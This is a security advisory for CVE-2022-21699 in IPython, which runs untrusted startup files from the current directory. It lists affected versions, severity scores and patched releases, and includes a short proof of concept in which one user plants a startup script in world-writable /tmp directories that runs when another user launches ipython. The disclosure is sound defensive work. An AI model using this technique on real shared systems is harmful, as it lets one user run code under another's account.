logo

CVE-2022-21699 ipython

Package

Manager: pip
Name: ipython
Vulnerable Version: >=0 <5.11 || >=6.0.0 <7.16.3 || >=7.17.0 <7.31.1 || >=8.0.0 <8.0.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P

EPSS: 0.02018 pctl0.8304

Details

Execution with Unnecessary Privileges in ipython We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another. Proof of concept User1: ``` mkdir -m 777 /tmp/profile_default mkdir -m 777 /tmp/profile_default/startup echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py ``` User2: ``` cd /tmp ipython ``` User2 will see: ``` Python 3.9.7 (default, Oct 25 2021, 01:04:21) Type 'copyright', 'credits' or 'license' for more information IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help. stealing your private secrets ``` ## Patched release and documentation See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699, Version 8.0.1, 7.31.1 for current Python version are recommended. Version 7.16.3 has also been published for Python 3.6 users, Version 5.11 (source only, 5.x branch on github) for older Python versions.

Metadata

Created: 2022-01-21T18:55:30Z
Modified: 2024-09-27T17:22:07Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-pq7m-3gw7-gq5x/GHSA-pq7m-3gw7-gq5x.json
CWE IDs: ["CWE-250", "CWE-269", "CWE-279"]
Alternative ID: GHSA-pq7m-3gw7-gq5x
Finding: F159
Auto approve: 1